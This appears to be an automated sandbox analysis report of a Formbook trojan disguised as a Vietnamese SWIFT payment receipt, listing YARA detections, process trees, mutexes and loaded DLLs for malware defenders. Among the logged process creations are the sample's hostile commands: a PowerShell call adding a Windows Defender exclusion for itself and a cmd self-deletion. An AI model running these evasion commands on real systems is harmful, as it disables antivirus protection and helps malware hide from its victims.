Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.3376444530.00000000115A7000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe PID: 5920, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe PID: 1364, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: colorcpl.exe PID: 2820, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, GXx0SGmTOiRtn7taWO.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, GXx0SGmTOiRtn7taWO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, GXx0SGmTOiRtn7taWO.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, GXx0SGmTOiRtn7taWO.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, GXx0SGmTOiRtn7taWO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, GXx0SGmTOiRtn7taWO.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, ttLDUujofieHjDbfiY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, ttLDUujofieHjDbfiY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, GXx0SGmTOiRtn7taWO.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, GXx0SGmTOiRtn7taWO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, GXx0SGmTOiRtn7taWO.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, ttLDUujofieHjDbfiY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@11/6@6/3

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqurixrq.wpr.ps1

Jump to behavior

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	ReversingLabs: Detection: 58%
Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Virustotal: Detection: 53%

Source: unknown	Process created: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process created: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Process created: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
